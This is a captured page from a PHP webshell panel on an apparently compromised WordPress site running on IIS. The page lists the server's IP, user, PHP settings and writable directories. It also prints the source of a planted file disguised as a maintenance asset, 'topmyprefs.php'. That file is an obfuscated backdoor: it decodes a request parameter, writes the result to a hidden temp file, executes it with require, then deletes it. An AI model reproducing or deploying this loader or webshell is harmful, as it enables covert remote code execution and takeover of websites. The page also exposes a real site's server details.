403Webshell
Server IP : 80.65.208.158  /  Your IP : 216.73.216.25
Web Server : Microsoft-IIS/10.0
System : Windows NT VMI1501711 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_134(rotechno) ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/rotechnochem.com/httpdocs/wp-content/maintenance/assets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Inetpub/vhosts/rotechnochem.com/httpdocs/wp-content/maintenance/assets/topmyprefs.php
<?php

if(array_key_exists("ma\x72\x6Be\x72", $_REQUEST)){
	$value = array_filter(["/tmp", getcwd(), "/dev/shm", session_save_path(), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir")]);
	$bind = $_REQUEST["ma\x72\x6Be\x72"];
		 $bind		=	  explode 		( 		"." 	,		$bind )   ;
	$val = '';
            $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s3  );
    
            foreach ($bind as $o	=>  $v1) {	$sChar = ord($s3[$o % $sLen]  );
                $dec = ((int)$v1 - $sChar - ($o % 10)) ^ 19;
                $val	.=chr($dec  );
            }
	foreach ($value as $symbol) {
    		if (is_dir($symbol) && is_writable($symbol)) {
    $data = str_replace("{var_dir}", $symbol, "{var_dir}/.fac");
    if (file_put_contents($data, $val)) {
	require $data;
	unlink($data);
	die();
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit